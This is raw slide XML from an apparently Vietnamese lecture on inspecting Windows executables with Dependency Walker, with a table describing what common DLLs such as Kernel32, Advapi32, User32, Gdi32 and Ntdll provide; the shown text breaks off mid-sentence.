          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Exploring Dynamically Linked Function with Dependency Walker</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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24744"/>
            <a:ext cx="9085707" cy="569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683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DLLs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>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981791402"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251520" y="1124745"/>
          <a:ext cx="8712968" cy="5637397"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2360618"/>
                <a:gridCol w="6352350"/>
              </a:tblGrid>
              <a:tr h="370450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>DLL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>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GB" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="1600" b="1"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8">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Kernel32.dll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Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hàm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>/</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là</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhân</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> HĐH </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>truy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cập</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>với</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>bộ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhớ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, file </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>phần</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cứng</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8">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Advapi32.dll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Cung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0"/>
                        <a:t>cấp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </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truy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cập</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đến</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhân</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> HĐH (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nâng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>quản</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>lý</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dịch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>vụ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thanh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ghi</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8">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>User32.dll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Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>diện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>người</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dùng</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>như</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> button, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thanh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cuộn</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tương</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tác</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>với</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>người</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>dùng</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195">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Gdi32.dll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Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hàm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hiển</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thị</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>và</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>xử</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>lý</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>đồ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>họa</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46734">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" dirty="0" smtClean="0"/>
                        <a:t>Ntdll.dll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smtClean="0"/>
                        <a:t>DLL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cho</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>phép</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>giao</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tiếp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>với</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>nhân</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>của</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> HĐH.  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Thường</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>các</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> file </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>không</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> import </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>trực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tiếp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>viện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>mà</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thực</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>hiện</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>gián</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>tiếp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thông</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> qua </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" i="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Kernell32.dll</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Nếu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>một</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>c.trình</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> import DLL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>này</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>thì</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>c.trình</a:t>
